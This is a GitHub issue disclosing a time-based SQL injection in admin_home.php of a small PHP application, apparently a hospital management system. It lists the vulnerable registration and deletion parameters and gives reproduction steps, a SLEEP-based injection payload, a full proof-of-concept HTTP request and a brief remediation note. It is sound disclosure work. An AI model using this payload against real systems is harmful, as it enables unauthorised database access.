Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection vulnerability via multiple parameters in admin_home.php #3

Open
khanhchauminh opened this issue Nov 8, 2021 · 0 comments

Comments

@khanhchauminh
Copy link

Author

KhanhCM (@khanhchauminh)

Version: 1.0

Vulnerable parameters

Staff Registration:

  • afullname
  • aemail
  • apassword

Doctor Registration:

  • dfullname
  • demail
  • dpassword
  • dSpecialist

Delete Clerks:

  • ClDelEmail

Delete Doctor:

  • DrDelEmail

Steps to reproduce

  1. Go to Staff Login page
  2. Login with User Type = Admin
  3. Input personal information in the form
  4. Click on the Register button
  5. Intercept the request and insert the payload in the value of parameters.

Example payload:

' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a

Proof-of-concept

POST /admin_home.php HTTP/1.1
Host: 127.0.0.1:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/admin_home.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jb2naa6oef92cak3bcohm1dus1
Connection: close

afullname=staff1'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&aemail=staff1%40example.com&apassword=password

Response in Burpsuite

image

Source code review

admin_home.php

image

library.php

Remediation

Validate input of all vulnerable parameters in admin_home.php.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant